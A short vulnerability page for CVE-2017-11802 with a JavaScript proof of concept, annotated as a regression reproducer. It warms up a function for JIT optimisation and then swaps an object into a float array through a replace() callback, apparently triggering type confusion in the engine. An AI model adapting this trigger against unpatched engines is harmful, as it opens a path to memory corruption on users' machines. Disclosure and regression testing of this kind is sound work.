
CVE-2017-11802.md


CVE-2017-11802

  • Report: Aug 2017
  • Fix: Oct 2017
  • Credit: lokihardt of Google Project Zero

PoC

/**
 * Regression reproducer for CVE-2017-11802 (credited on this page to lokihardt of
 * Google Project Zero).
 *
 * What the code visibly does: it calls `opt` 0x1000 times with a callback that has no
 * side effects, then calls it once more with a callback that stores an object into
 * `arr` in the middle of `opt`'s numeric stores, and finally prints `arr[1]`.
 *
 * NOTE(review): the page states neither the affected engine nor the root cause. The
 * shape of the test suggests it checks whether an optimizing JIT re-validates its
 * assumptions about `arr` after the user callback reached through
 * String.prototype.replace -- confirm against the vendor advisory.
 *
 * Expected result on a correct engine: `arr[1]` reads back as the number `opt` stored
 * (2.3023e-320 + 0). A crash or any other output means the check this test guards has
 * regressed.
 */
function main() {
    // Array literal holding only floating-point numbers.
    let arr = [1.1, 1.1, 1.1, 1.1, 1.1];
    // `f` is passed to replace() as the replacement function, so it runs between the
    // store to arr[0] and the store to arr[1].
    function opt(f) {
        arr[0] = 1.1;
        // replace() calls f; its string result is parsed and added to a denormal double.
        // The assignment to arr[1] happens only after f has returned.
        arr[1] = 2.3023e-320 + parseInt('a'.replace('a', f));
        arr[2] = 1.1;
        arr[3] = 1.1;
    }

    // Warm-up: 0x1000 (4096) calls with a callback that only returns '0'.
    // Presumably this is what gets `opt` compiled by the optimizing tier -- TODO confirm
    // the threshold for the engine under test.
    let r0 = () => '0';
    for (var i = 0; i < 0x1000; i++)
        opt(r0);

    // Final call: the callback stores an object into arr[0], so `arr` no longer holds
    // only numbers when the remaining stores in `opt` execute.
    opt(() => {
        arr[0] = {};
        return '0';
    });

    // `print` is not defined on this page; presumably the JS shell's output function.
    print(arr[1]);
}

// Run the reproduction once when the script is loaded.
main();

Reference